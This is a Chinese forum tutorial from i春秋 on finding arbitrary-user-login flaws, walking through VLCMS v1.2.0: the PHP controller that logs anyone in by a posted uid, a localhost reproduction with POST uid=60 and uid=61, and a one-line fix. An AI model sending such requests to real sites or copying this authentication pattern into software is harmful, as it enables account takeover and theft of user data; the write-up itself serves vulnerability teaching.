1
回答
如何挖掘任意用户登录漏洞
利用AWS快速构建适用于生产的无服务器应用程序,免费试用12个月>>>   

0x01  前言   
   本文参与i春秋现金奖励计划,未经允许,严禁转载。


0x02  什么是任意用户登录漏洞
   几乎每个网站都有自己的会员系统,有会员,就有登录机制,如果可以登录其他用户账户,那么就可以窃取其他用户的资料数据。如果配合上脚本的话,甚至可以批量获取用户的数据。对网站来说,任意用户登录是一个很高危的漏洞。


0x03  实战的案例(白盒测试)
     Vlcmsv1.2.0,就拿这套CMS来说吧。
     vlcms/Application/Media/Controller/MemberController.class.php
     post获取uid传进autoLogin()中

public function res_login(){
                parent::autoLogin($_POST['uid']);
                echo $this->ajaxReturn(array("status"=>0,"uid"=>$_POST['uid']));
        }

将id传进entity()。

protected function autoLogin($uid){
                $user =$this->entity($uid);
        /* 记录登录SESSION和COOKIES */
        $auth = array(
            'mid'             => $user['id'],
            'account'             => $user['account'],
            'nickname'        => $user['nickname'],
            'balance'         => $user['balance'],
            'last_login_time' => $user['login_time'],
        );
        session('member_auth', $auth);
        session('member_auth_sign', data_auth_sign($auth));
        }

entity中直接根据id查询账户了。。所以只需一个id就能登录任意用户。

protected function entity($id){
                $data = M('User','tab_')->find($id);
                if(empty($data)){
                        return false;
                }
                return $data;
        }


0x04  实战的案例(黑盒测试)
     http://127.0.0.1/vlcms/index.php?s=/member/res_login/
     POST:uid=60
     访问后,返回一串代码。
       
     接着访问http://127.0.0.1/vlcms/index.php?s=/member/,可以看到,已经成功登录账户
       
     访问:post:uid=61
       

接着访问http://127.0.0.1/vlcms/index.php?s=/member/
成功登录uid为61的账户
  

0x05  修复建议
     不要用id来判断账户身份。

<无标签>
举报
i春秋学院
发帖于9个月前 1回/335阅
顶部